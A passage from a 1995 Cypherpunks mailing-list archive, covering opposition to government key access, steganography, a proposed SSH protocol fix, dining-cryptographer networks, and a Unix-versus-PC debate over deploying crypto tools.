a congresscritter grows to encompass all three branches under "us" and views the unwashed masses as "them." In that view the suit from XYZ who comes over to confer with the staffers is "one of us." He gets right in (while visiting constituents wait stupidly for an appointment that the elected official will be -- we're so sorry -- unable to keep). He's bringing up an issue of concern to "us." "We" have a problem that needs to be fixed by modifying para (a) of sec (3) to read "shall" instead of "may." "We" will feel very important and may even win some special stroking or quid pro quo for fixing "our" problem. The one real flaw in this is that the electorate was just left out of the loop, and kept in the dark to boot. When the elected official went into "we" mode he ceased representing the people who sent him there. In these increasingly totalitarian times it's likely his representation was distinctly CONTRARY to the interest of those who sent him there. There have been cases of agencies approaching "their" congressman and having completely new language inserted in a conference bill -- language that was never in the original, never offered as an amendment until the bill from each house went to conference, and never debated when the conformed bills returned for final vote. It's the norm that such maneuvers go completely unreported in the media. >Congressmen are by and large harried and ignorant people. They have no >idea what any of this is about. We have the choice of letting Louis >Freeh do all the educating, or having a white shoe Washington PR firm >do some of the educating, too. I favor the latter approach. There is also something that is almost always overlooked... taking names. It is possible to "pull on the string" and follow the visible event back to the less immediately visible actors. The congresscritters, though by and large harried and ignorant, are not always guiltless. At best they are willing agents for little bits and pieces of the fabric of overweening statism. In every case, though, there are faceless staffers who may also be harried but are usually NOT ignorant. The staffers are often the ones who "sell" the congresscritter on signing onto this or that non-voter issue for this or that self-serving political reason. Staffers also include the people with huge political axes to grind -- people who gravitate to the positions of writing the text of the bills that translate the generality to which the elected official has acceded into excruciatingly detailed and usually confusing legislative language. There's a relatively small number of really activist people in government, and not all of them are public and visible. It's possible that some congresscritters could be defeated with the aid of dissemination back home of information on the non-voter issues they've championed and concise explanations of how many of those issues work to harm their voters. It's also possible that some of those faceless staffers could be turned into liabilities by focusing some light on them, thereby reducing their effectiveness and employability. >This is not to say that we shouldn't be widely deploying crypto -- we >should. (Of course, offshore sites will always have crypto available, >but...) It would seem that the U.S. may lose a number of good minds who may prefer to live and write code in other parts of the world. This has been a developing trend for other reasons, and now people who like to write crypto will have another reason to look for a new home. >This is also not to say that Congress doesn't pass very bad laws. Name a good one! >However, I very, very strongly urge that we not assume that nothing >can be done. Just winning a couple years time could totally alter the >landscape. Your urging is appropriate. It's odd, though, how the country seems to be pulling itself in two diametrically opposed directions: On the one hand the electorate shifted significantly in the '94 election, responding with greater enthusiasm than even the new young Turks in Congress seem to fully comprehend, and seeming to be fed up with too much government, prepared to commission the dismantling of federal bureaucracy and getting government the hell out of their lives. On the other hand we see bold and impressive moves on the part of politicos and bureaucrats toward a suffocating, draconian 1984 police state. We have even heard increasing choruses of "Just following orders" and "Just doing my job" from mindless hatchetmen these last few decades -- bizarre and incredible echos of the excuses offered in post-WWII war crimes defenses. The country cannot move strongly in these two directions for long: Something has to give. The longer this division persists, the greater the gulf that stretches between and the more "interesting" the times that will result when one side prevails. The side that prevails will consume the side that fails with an intensity related to the energy built up in the process. Crypto is presently on the periphery of the larger schism, though it's conceivable that twenty years in the future it would be clearly understood by most people to be central to privacy in an information age. The moves to head crypto, and thus privacy, off at the pass are being made now, though, in an effort to prevent a future in which large numbers of people understand how to maintain privacy when everything is a bit stream. If there is a critical and unique difference between this and other seemingly similar situations it is the 10-15% monthly growth of the Internet, something that is orders of magnitude greater than what humans are accustomed to perceiving, estimating, handling, coping with. If recent figures are accurate, 7,500+ new web pages have been created in the 33 hours since this thread started here and perhaps 100,000 new people are on the net in one way or another. It's unlikely that Grassley or Exon or Leahy can assimilate all the implications of that rate of growth. "Senator, the blob is at the door!" "Well, call the State Police!" "Uh, sir, they're at least three hours away. In that time the blob will be larger than the State of Idaho!" The politicos have never before dealt with a sizable "throwaway minority" whose current growth curve intersects the U.S. population curve in 24 months and the world population curve in 4 years. In a couple of days there are more new people getting on the net worldwide than are contained in a U.S. congressional district. Partly as a result, there are issues getting attention that would have easily been contained just a couple of years ago by the policy of benignly overlooking them. No longer. If a net mobilization was disappointing last month, try it this month and see the difference. Movements that took years to form and grow decades ago take days or weeks now. Soon they will take only hours. We are just now cresting the big one on the supercharged roller coaster of high tech infoplosion, and as the velocity rapidly builds there will be profound shock among the old and the slow. Even the savvy will be surprised. Push this medium for all it's worth. Find ways to promote informed privacy as a ground-floor issue for newbies and get them to have a knowledgable, vested interest in it. Get people onto the net. One new person today is four or five people a year from now, 15-28 people two years from now. Since a lot of it spreads from person to person, new people start with tools and concepts they get from others, so the initiation of a new netparticipant as a privacy-aware crypto user tends to spawn subtrees of new users in the same mode. Use the growth multiplier to outflank 'em while they're noodling. Would it be more productive to hire the white shoes or start another few ISPs and shepherd the new users to be privacy-aware letter writers and faxers? Educate your ISPs. Any ISP that isn't political in this age is brain dead and dead weight. Any ISP that sees its political interests as somehow different than those of its users (recent lobbying to shift burdens away from national services and onto users, and recent AOL admissions of participation in what sounded like entrapping users) is worse than brain dead -- it's part of the problem. Bolivar From silly at ugcs.caltech.edu Sat Jul 15 03:06:50 1995 From: silly at ugcs.caltech.edu (me) Date: Sat, 15 Jul 95 03:06:50 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507131855.AA04443@cs.umass.edu> Message-ID: <199507151006.DAA28022@beat.ugcs.caltech.edu> In mlist.cypherpunks you write: >GAK: it's not just a bad idea, it may soon be the law ! Help! What does GAK stand for? I've seen it a billion times, but I missed the original explanation. It sounds like some sort of key/crypto registration. (me) From jim at acm.org Sat Jul 15 05:18:55 1995 From: jim at acm.org (Jim Gillogly) Date: Sat, 15 Jul 95 05:18:55 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <199507151006.DAA28022@beat.ugcs.caltech.edu> Message-ID: <199507151218.FAA00476@mycroft.rand.org> > silly at ugcs.caltech.edu ((me)) writes: > Help! What does GAK stand for? I've seen it a billion times, Government Access to Keys; also seen as GACK (Crypto Keys). This is more descriptive and accurate than calling it Key Escrow, since escrow is for the benefit of the parties involved in a transaction. I think it's Carl Ellison's invention, and most apt it is. Jim Gillogly 22 Afterlithe S.R. 1995, 12:16 From pgf at tyrell.net Sat Jul 15 05:38:41 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sat, 15 Jul 95 05:38:41 PDT Subject: Receiver anonymity in DC-nets... Message-ID: <199507151234.AA14413@tyrell.net> A method occured to me that obviates the need for public-key cryptography as a method of receiver anonymity in a dining-cryptographer network. I'm *sure* someone has thought of this before. I don't, however, have access to netscape or mosaic just now to search the archive with. If this topic or method has come up before (if you know of it, you'll know what I'm talking about; if not, and noone has come up with it before, which I doubt, I'd still like the patent ;-) and one of you guys has the relevant messages handy could you send them to me? Don't go through any great trouble, you understand... Phil From sandfort at crl.com Sat Jul 15 05:41:46 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 15 Jul 95 05:41:46 PDT Subject: MANDATORY KEY REGISTRATION In-Reply-To: <199507151218.FAA00476@mycroft.rand.org> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Sat, 15 Jul 1995, Jim Gillogly wrote: > Government Access to Keys; also seen as GACK (Crypto Keys). This is more > descriptive and accurate than calling it Key Escrow, since escrow is for > the benefit of the parties involved in a transaction. I favor the term, "Mandatory Key Registration." It is even more accurate, and parallels gun registration. This should strike a sympathetic chord with our pro-2nd Amendment friends. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jya at pipeline.com Sat Jul 15 07:01:45 1995 From: jya at pipeline.com (John Young) Date: Sat, 15 Jul 95 07:01:45 PDT Subject: POX_usg Message-ID: <199507151401.KAA14738@pipe4.nyc.pipeline.com> 7-15-95. NYPaper Page Oners: "Director of F.B.I. Demotes Deputy: No. 2 Man's Ouster Is Tied to Inquiry on Idaho Siege." F.B.I. Director Louis J. Freeh today demoted the bureau's Deputy Director, Larry A. Potts, citing the turmoil created by an internal investigation into the destruction of documents relating to the conduct of Mr. Potts and other senior F.B.I. officials in a deadly 1992 standoff with a white separatist in Idaho. SAV_ass "B-2, After 14 Years, Is Still Failing Basic Tests." The $44 billion B-2 bomber has radar that cannot distinguish a raincloud from a mountainside, has not passed most of its basic tests and may not be nearly as stealthy as advertised, according to a draft report by the General Accounting Office. It was provided to The New York Times by a Government official skeptical of the bomber's capabilities who sought to bring into the debate the report's examples of the B-2's inability to pass performance hurdles. YB2_gud 2n1: POX_usg From Andrew.Spring at ping.be Sat Jul 15 07:18:36 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sat, 15 Jul 95 07:18:36 PDT Subject: def'n of "computer network" Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >rick hoselton writes: >> Perry, I don't understand. If the least significant bits in my gif file >> follow all the "known statistical distributions", how can anyone know >> whether they are "just noise" or are an encrypted message, If your attacker has a more sophisticated statistical model of noise distributions than you do, then he can deduce the existence of message. > >Indeed -- how could the recipient even know to look, unless these >things arrived regularly and with a fully standardized form of >stegonography, in which case why bother, all you've done is come up >with a very odd form of transfer encoding. > >If the recipient does know to look, that implies either that there is >a hint, in which case the stegonography is useless, or it implies that >you have prearrangement, in which case my comments on prearrangement >hold. Well, there's things like the subliminal channel in DSS (discussed in Applied Cryptography) whereby a DSS chip could leak bits of a user's private key. In the channel discussed, even if the user suspected the existence of the channel, there's no way he can prove it. Now, that's steganography! -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBMAfXAI4k1+54BopBAQHF4AQA2jRHvyKQ0ojYj7GHWpmZ+hz84dsXDtUS NJHqxjjIK1RtvPFAm4QI8p3lt/ovGKLH+CjpC0QuHZ0B3O3INkz/zD7IwsU+1SJA QycBquLvh7Q/dPkZ6J6P87Bmy0gzNBJrvW7rxLuOQyu9EOUtixFS2H9lDNa8zISp xZ/4yrb1/ZE= =NKwt -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From Andrew.Spring at ping.be Sat Jul 15 07:18:41 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sat, 15 Jul 95 07:18:41 PDT Subject: mistake on my part Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > >Looking for a place that: > >(1.) is reasonably free > >(2.) permits Americans to work > >(3.) a person trained as an engineer can earn enough to feed and shelter > self and 4 dependents. > Tattoo this on your arm: N.A.T.O. If you work overseas, you deduct 70 kilobucks from your gross income on your 1040. And NATO civilian employees pay NO INCOME TAX TO ANY OTHER NATO COUNTRY. Good bennies package, too. Downside? A Glacial Slug-like Beauracracy which doesn't seem to get alot done. 3-Year contracts only. Major competition from Euro's who seem to know about the perks. Organization Motto: "It's a cushy job, but somebody's got to do it." -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBMAfXPo4k1+54BopBAQGxYwP/TkePpofICj/w554DfO2ugqKXo/Jzrz+0 YebTxGHi4cgjDSwnOco4a8GYjDtInbWdyCF9qwt1QzQli7hw4o5fjKKb6as8JOMX WGcotpJwmsiNgBcUC/aUshmAdHjpK/tkZrwumeV8hx5acxmgqvE8pGNT3Fc0QYhn QwtB/SWjS9k= =ejaZ -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From Andrew.Spring at ping.be Sat Jul 15 07:19:00 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sat, 15 Jul 95 07:19:00 PDT Subject: Root Causes Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Is there any precedence or possibility of either filing civil or criminal >charges against a Government official for their _official_ actions? >Something that will not only make for some Serious Press, but hit them from >an unexpected angle? > It's extremely difficult to do that and not get laughed out of court. Think about it. If the president or congress could be sued for their official actions, every unemployed auto worker would be suing them for not restricting Japanese imports. That's what sovereign immunity is for; to keep the government from being nibbled to death by millions of little nuisance suits from soreheads all over the country. >Alternatively, could a civil suit be filed for invasion of privacy or >somesuch? Or perhaps the previously mentioned violation of civil rights (a >la Rodney King)? > Well actually, Congress is probably not subject to it's own laws on privacy. I remember during the Clarence Thomas confirmation hearings there was a bit of a to-do about exactly who it was that leaked Anita Hill's allegations to the press; and Joe Biden was going around saying "No crimes were committed, no crimes were committed." This was explained as Congress-speak for "The leak of Hill's allegations were done by a Congressman, not a staffer" (It's illegal for staff member to disclose confidential material, but it's OK for his boss to do it). >How many laws, etc, can we invoke? I mean, most congresscritters don't craft >laws on their own, so the involvement of their staff would constitute >conspiracy, as well, wouldn't it? > First rule of computer self preservation: never try to hack a hacker. Any legal harrassment you can do to them, they can do to you. They're better at it, and they've got a lot more money than you do. -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBMAfWao4k1+54BopBAQGjXgP/e6I7dvnOb45EGD4M06KIuKvZu1FqAQFV Ljt5YFwPrIJuvoiVCZ+u/5d4EGsmCjh3kAUmFY/mJG/9dUj4nFMJFZjssjtuVi3X hY4I/XFzx6tyTEE0RYOjgZPYx/ruZxegNSBnwMypDAGoYnw2SlExV22hLqVBT3A2 mZLKkHYpm0Q= =ARI+ -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From ylo at cs.hut.fi Sat Jul 15 08:02:37 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Sat, 15 Jul 95 08:02:37 PDT Subject: Ssh "security hole": proposed fix In-Reply-To: <9507151255.AA12685@sulphur.osf.org> Message-ID: <199507151502.SAA01269@shadows.cs.hut.fi> I am thinking about the following solution to the issues pointed out by David Mazieres. These changes propose solutions to the following problems: - replay of password-authenticated sessions - corrupt server can use RSA authentication to log into another server When the client receives SSH_SMSG_PUBLIC_KEY, it computes a 128 bit (16 byte) value by converting the modulus of the public key into a stream of bytes, msb first. The cookie sent by the server is appended to this stream. Both sides compute the MD5 of the resulting stream. This value will be called the "session id". In the SSH_CMSG_SESSION_KEY message, the first 16 bytes of the session key (before encryption) are xored with the 16 bytes of the session id. This does not reveal plain text from the RSA-encrypted part, but binds the encrypted session key to a specific cookie and server. This should eliminate the possibility of replay, because the cookie is unique for each connection. In all SSH_CMSG_AUTH_RSA_RESPONSE messages (used both in user and client host authentication), append the session id to the decrypted challenge before computing MD5. The MD5 is computed from the resulting 48 bytes. This makes the response bound to the server cookie and the server key, and should elinate using the same response for another server. (Faking the server key is hard, because the client verifies that it matches the one stored in its database.) If a server supports this revision of the protocol, it reports its protocol version as 1.1. If the server protocol version is 1.0, the client displays a warning (recommending to update server software) and uses the old protocol for compatibility. The client reports the protocol version that it will use. The compatibility code will be removed in a later release. (The changes are easy to implement compatibly.) I would like to receive comments on this. Tatu From pgf at tyrell.net Sat Jul 15 08:06:42 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sat, 15 Jul 95 08:06:42 PDT Subject: Mods to Dining Cryptographers: legal questions... Message-ID: <199507151502.AA25734@tyrell.net> I'm sorry if I was a little mysterious about my reference to another use or mode of a DC-net; I'd _love_ to tell the rest of you flat-out, and put the idea in the public domain, but I'm not sure I _CAN_. (All of this is only relevant, however, if noone else has thought of it first; I think this is unlikely at the moment, as it would mandate a large rewriting of the section on DC-nets in the cyphernomicon. On the other hand, I'm kinda suprised that noone else has thought of this.) Anyway, I just have this awful feeling that if I post this, there's going to be a stupid patent application filed by someone like Jim Bidzos claiming this and I won't be able to do anything about it. (Please note I mean the people _like_ Jim Bidzos and not Jim Bidzos himself; he's merely an example of someone who has a lot of capital to spend on software patents. I don't, and don't mean to say that _he_ goes around stealing ideas from other people and patenting them.) How do I do this and protect myself from the people who do have the money to go through the intellectual property courthouse game? Should I just dump this in the public domain? Perhaps show it to a trusted individual (or two) on this list to look at and see whether it is worth further development (perhaps not?)? Are there any patents on Dining-Cryptographers networks that could interfere with the placing in the public domain, or the patenting, of an improvement to the network system? I need help. Phil +----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+ | Phil Fraering / \"The English Hierarchy, if there be anything unsound in| | pgf at tyrell.net\ /its constitution, has reason to tremble even at an air | +----------------+-pump or an electrical machine."---Joseph Priestly------+ From jgrubs at voxbox.norden1.com Sat Jul 15 08:10:33 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Sat, 15 Jul 95 08:10:33 PDT Subject: MISC> Current US National Security Directives published In-Reply-To: <3tuelf$6e3@westie.mid.net> Message-ID: Path: voxbox!hypnos!ragnarok.oar.net!malgudi.oar.net!kira.cc.uakron.edu!neoucom.edu!news.ysu.edu!news.ecn.uoknor.edu!bubba.ucc.okstate.edu!news.ksu.ksu.edu!news.mid.net!news.mid.net!not-for-mail From: Gleason Sackman Newsgroups: comp.internet.net-happenings Subject: MISC> Current US National Security Directives published Message-ID: <3tuelf$6e3 at westie.mid.net> Date: 11 Jul 1995 13:07:43 -0500 Sender: infoserv at news.mid.net Organization: MIDnet, the Midwest's Gateway to the Global Internet. Lines: 96 Approved: ralphie NNTP-Posting-Host: westie.mid.net *** From Net-Happenings Moderator *** Date: Mon, 26 Jun 1995 18:15:21 -0500 From: SIMPSON at AUVM.AMERICAN.EDU Subject: Current US National Security Directives published CURRENT U.S. NATIONAL SECURITY DIRECTIVES PUBLISHED This announcement is likely to be of particular interest to librarians, historians, and journalists specializing in government documents, international affairs, military affairs and military history, nuclear policy, outer space, and US trade and technology policy..... Thank you for letting me share this with you. -- Christopher Simpson I've compiled an unusually complete collection of presidential National Security Decision Directives from the administrations of Ronald Reagan and George Bush (1981-1993). The collection is similar in certain respects to the well known _Foreign Relations of the United States_ (FRUS) series, but is far more current. The declassified texts of more than 250 NSDD's are included; each text has an introduction describing its origin and context; and there is an extensive cross-index and subject index. The collection goes considerably beyond the NSDDs available at the US National Archives or in any other collection, because it includes verbatim texts of directives that have been leaked in whole or in part by the administration, but not formally declassified. It also includes tables of organization of the National Security Council. The new collection's format also makes it much less expensive, and easier to use, catalog and store than any comparable microform or hard copy collection. Major areas of coverage include: ++ management of US national security policy, covert operations, weapons procurement, arms control negotiations, and anti-terrorism policies; ++ US relations with Israel, Europe, USSR, China, Australia, Nicaragua, Mexico, Central America, East Africa, Japan, Germany, Southeast Asia, Micronesia, Libya, Egypt, Iran, Iraq, the Philippines, Yugoslavia, South Africa and Namibia, etc., etc. ++ nuclear weapons procurement and testing, nuclear arms control; internal debates over SALT, ABM, START, SDI and related matters; civil defense and FEMA; ++ Space policy, privatization of space assets, NASA-DOD conflicts, space and aerospace procurement; ++ Trade policy with Japan, G-7 summits, technology transfer, export controls, economic warfare, subsidies for strategic US industries; ++ Telecommunications and computer policy, including technology security policies; ++ drugs and US foreign policy; ++ the Iran-Contra affair and its aftermath; ++ internal security and emergency continuity of government policies; ++ war with Iraq; and much more. For further information: _National Security Directives of the Reagan and Bush Administrations; The Declassified History of US Political and Military Policy 1981-1991,_ by Christopher Simpson. 1032 pages. Westview Press, 1995 isbn: 0-8133-1177-2 list: $119.95 telephone: 303-444-3541 fax: 303-449-3356 "... absolutely indispensable for studying U.S. national security policies during the Reagan and Bush administrations." Melvyn Leffler, President, Society for Historians of American Foreign Relations "... painstaking and expert analysis... an important benchmark" Charles Tiefer, Deputy General Council and Solicitor, US House of Representatives ===================================================== From an250888 at anon.penet.fi Sat Jul 15 08:27:13 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Sat, 15 Jul 95 08:27:13 PDT Subject: Deployment Message-ID: <9507151505.AA23237@anon.penet.fi> >In addition, now is the time to deploy stego, on a massive scale. >How many stego programs have been released for Unix? Unix? The masses use DOS, Windows, Mac, and OS/2. All you Unix gurus with nifty Unix crypto utilities that PC users can only wonder about need to buy PC's and start porting now if you want to get anywhere. Unix? Hah! Gimme a break! Unix is a Warsaw ghetto. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From an250888 at anon.penet.fi Sat Jul 15 08:28:12 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Sat, 15 Jul 95 08:28:12 PDT Subject: Off Your But and Learn! ;*) Message-ID: <9507151505.AA23302@anon.penet.fi> >I am not a programmer either, but I am being motivated to become one. >If only there was more time. Neither am I, but may I suggest the following: S. Prata, C++ Primer Plus: Teach Yourself Object-Oriented Programming, 2d ed., Waite Group Press, ISBN 1-878739-74-3 (1995). Nuts & bolts. S. Lippman, C++ Primer, 2d ed., Addison-Wesley, ISBN 0-201-54848-8 (1993). Not quite so nuts and bolts, but good to read after covering the treatment of the same material in Prata. I've just starting working through these and find them effective. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From pgf at tyrell.net Sat Jul 15 08:54:53 1995 From: pgf at tyrell.net (Phil Fraering) Date: Sat, 15 Jul 95 08:54:53 PDT Subject: Deployment In-Reply-To: <9507151505.AA23237@anon.penet.fi> Message-ID: <199507151550.AA29983@tyrell.net> >In addition, now is the time to deploy stego, on a massive scale. >How many stego programs have been released for Unix? Unix? The masses use DOS, Windows, Mac, and OS/2. All you Unix gurus The masses aren't responsible for the net either; the unix people generally _are_. AFTER the tools are written for Unix, the stuff can undoubtedly be ported down to the mainstream OS's. I hear they're improving. with nifty Unix crypto utilities that PC users can only wonder about need to buy PC's and start porting now if you want to get anywhere. Unix? Hah! Gimme a break! Unix is a Warsaw ghetto. Unix is a Warsaw ghetto that can be run on almost any current PC, including many that have problems with Windows '95. And it's more capable. You think the penet remailer you just used is running in Windows? From jpb at shadow.net Sat Jul 15 10:07:41 1995 From: jpb at shadow.net (Joe Block) Date: Sat, 15 Jul 95 10:07:41 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: >> silly at ugcs.caltech.edu ((me)) writes: >> Help! What does GAK stand for? I've seen it a billion times, > >Government Access to Keys; also seen as GACK (Crypto Keys). This is more >descriptive and accurate than calling it Key Escrow, since escrow is for >the benefit of the parties involved in a transaction. I think it's Carl >Ellison's invention, and most apt it is. I like Federal Usurpation of Citizens Keys for Encrypted Discourse, myself. From cme at TIS.COM Sat Jul 15 10:30:43 1995 From: cme at TIS.COM (Carl Ellison) Date: Sat, 15 Jul 95 10:30:43 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <9507151728.AA15916@tis.com> >Date: Fri, 14 Jul 95 21:28:27 -0400 >From: "Brian A. LaMacchia" >Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd) > > > `(c) It shall be an affirmative defense to prosecution under this > > section that the software at issue used a universal decoding device > > or program that was provided to the Department of Justice prior to > > the distribution.'. > > This isn't escrowed encryption being allowed here. This is straight giving > of keys (or a back door) to the gov't. Even Clipper fails this test. > >Why doesn't GAK satisfy this clause? [...] > >I don't see how Clipper fails the 1030A(c) test, except possibly for the >fact that the proposed escrow agents were not both within DOJ. I think >that's a minor point. Sorry. That's the minor point I was talking about. For example, one might make an exportable system by doing something really nice for the gov't and giving NSA a back door master key for it to use. That doesn't give it to the DoJ -- and I'm not so sure NSA would admit to the existence of a back door much less release the master key. - Carl From jlasser at rwd.goucher.edu Sat Jul 15 11:03:56 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Sat, 15 Jul 95 11:03:56 PDT Subject: Deployment In-Reply-To: <9507151505.AA23237@anon.penet.fi> Message-ID: On Sat, 15 Jul 1995 an250888 at anon.penet.fi wrote: > >In addition, now is the time to deploy stego, on a massive scale. > >How many stego programs have been released for Unix? > > Unix? The masses use DOS, Windows, Mac, and OS/2. All you Unix gurus > with nifty Unix crypto utilities that PC users can only wonder about > need to buy PC's and start porting now if you want to get anywhere. A legitimate point; however, the majority of PC users won't be in the vanguard of /anything/ -- it's not the nature of the PC industry. If all the Unix folks do it, then the PC folks might. Besides, the first was the point I was making; the second, I was personally interested, because, after all, I run unix. In addition, many of the PC people who do Internet communications do it through a unix server anyway. So it would be beneficial. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From tj at compassnet.com Sat Jul 15 12:21:12 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Sat, 15 Jul 95 12:21:12 PDT Subject: Deployment Message-ID: I had thought to respond similarly when I first saw this unixcentric statement: >On Sat, 15 Jul 1995 an250888 at anon.penet.fi wrote: > >> >In addition, now is the time to deploy stego, on a massive scale. >> >How many stego programs have been released for Unix? >> >> Unix? The masses use DOS, Windows, Mac, and OS/2. All you Unix gurus >> with nifty Unix crypto utilities that PC users can only wonder about >> need to buy PC's and start porting now if you want to get anywhere. I have to take issue with this, though: >A legitimate point; however, the majority of PC users won't be in the >vanguard of /anything/ -- it's not the nature of the PC industry. If all >the Unix folks do it, then the PC folks might. The point *is* legitimate. I disagree that PC users won't be in the vanguard of anything: PC users *are* the market now (gag me with a TSR). A nifty program for PC will be in use by millions in a *very* short time, while a similar program for unix will not even be visible to the larger market. If PGP had been limited to the unix market, few people would know of it today. Frankly, the PC folks don't give a rat's ass what unix folks do. Watch the production and sales numbers for Windows 95 and gasp. For better or worse, that is the market, and that is where the bucks are to pay for connectivity, memory, disk, and... software. >Besides, the first was the point I was making; the second, I was >personally interested, because, after all, I run unix. I certainly don't want to bash unix, but I can't help but think that one's viewpoint of what's going on "out there" is strongly affected by the encapsulated universes we create for ourselves. If you like to run unix but hooked into it from another PC running TCP/IP under Windows, you'd see what the vast majority of new users see -- no command line, no need to deal with a 30 year old user interface (send flames to useless.arguments at blackhole.net). >In addition, many of the PC people who do Internet communications do it >through a unix server anyway. So it would be beneficial. Does that matter much? ISPs are proliferating like mushrooms, and the users hooking up to them have PCs and Macs. Users connect by PPP or SLIP and use mail and www clients. The user interface therefore has nothing to do with the connectivity or host OS. Most of them *never* telnet, and only some of them ftp to install web pages. Also, more and more people who connect to internet go *through* no ISP server at all. A modem controller at the ISP prompts for userid and password, then connects them to an interface that takes them to a router. Their packets flit over to the name server or out on the T1 as required, their traffic untouched by unix or any other OS. An ISDN connection comes in on the same T1 that will carry most of its packets back out to the world, with a connection manager and router being the closest things to computers involved in the process. At the far end of the net a server running who-cares-which- OS handles the client's traffic and responds to it by standards that are thoroughly OS-independent. I respectfully submit that improvements of user interface and tinker toy integration and development of new tools must be aimed at Windows / OS/2 / Mac System to have major impact, and at unix as a convenience to the important academic and other communities that work more directly with the unix user interfaces. Academic and scientific users may make the bulk of thoughtful contribution in many areas, but that's like server push -- if there's no client, nothing happens. --Bolivar From alex at forestbk.demon.co.uk Sat Jul 15 14:16:10 1995 From: alex at forestbk.demon.co.uk (Alex McLean) Date: Sat, 15 Jul 95 14:16:10 PDT Subject: Uk hackers Message-ID: <88422937wnr@forestbk.demon.co.uk> Hi, We're preparing to send a press release to all the UK newspapers and magazine that we can afford, on the subject of hackers. So far there haven't been many attacks by the media on this often misrepresented group, and we hope to start building a good relationship between hackers and the media while it is still possible. We plan to send them a comprehensive letter offering an alternative to the hacker stereotype, and maybe a floppy disk containing a few usenet faq files on the subject. If you have any ideas, suggestions or contributions to this effort, I'd very much like to hear from you. I'd also like to hear from you if you are a journalist yourself, and would like a copy of our release once it is done, or further information about our cause. Or if you'd just like a chat about this subject (wherever you are), feel free to mail me. Thanks, Alex -- All generalisations are false. That last sentence isn't a paradox of self-reference, and neither is this one. From Michael at umlaw.demon.co.uk Sat Jul 15 14:37:59 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Sat, 15 Jul 95 14:37:59 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <2426@umlaw.demon.co.uk> In message <9507150128.AA16854 at toad.com> "Brian A. LaMacchia" writes: [...] I agree that as drafted any GAK'ed crypto satisfies the affirmative defense under Grassley's s. 1030(a). > > The proposed 1030A(c) provides a defense to prosecution under 1030A(a). > So if GAKed crypto satisfies 1030A(c) then it can be deployed without > fear of prosecution under 1030A(a). It might still violate ITAR, of > course, although I suspect any system that satisfies 1030A(c) would be > granted a CJ. AFAIK, neither Clipper nor Capstone have actually gotten export clearance yet. No demand? Fact that there were at last count no more than two beta versions of the decrypt processor in existence? Or is my info just out of date.... [...] -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From tcmay at sensemedia.net Sat Jul 15 16:04:03 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sat, 15 Jul 95 16:04:03 PDT Subject: Unix not the Only Place for "Vanguard" Applications Message-ID: At 5:59 PM 7/15/95, Jon Lasser wrote: >On Sat, 15 Jul 1995 an250888 at anon.penet.fi wrote: > >> >In addition, now is the time to deploy stego, on a massive scale. >> >How many stego programs have been released for Unix? >> >> Unix? The masses use DOS, Windows, Mac, and OS/2. All you Unix gurus >> with nifty Unix crypto utilities that PC users can only wonder about >> need to buy PC's and start porting now if you want to get anywhere. > >A legitimate point; however, the majority of PC users won't be in the >vanguard of /anything/ -- it's not the nature of the PC industry. If all >the Unix folks do it, then the PC folks might. I disagree with this, depending on what one's interpretation of "vanguard" is, and for what products. For example, 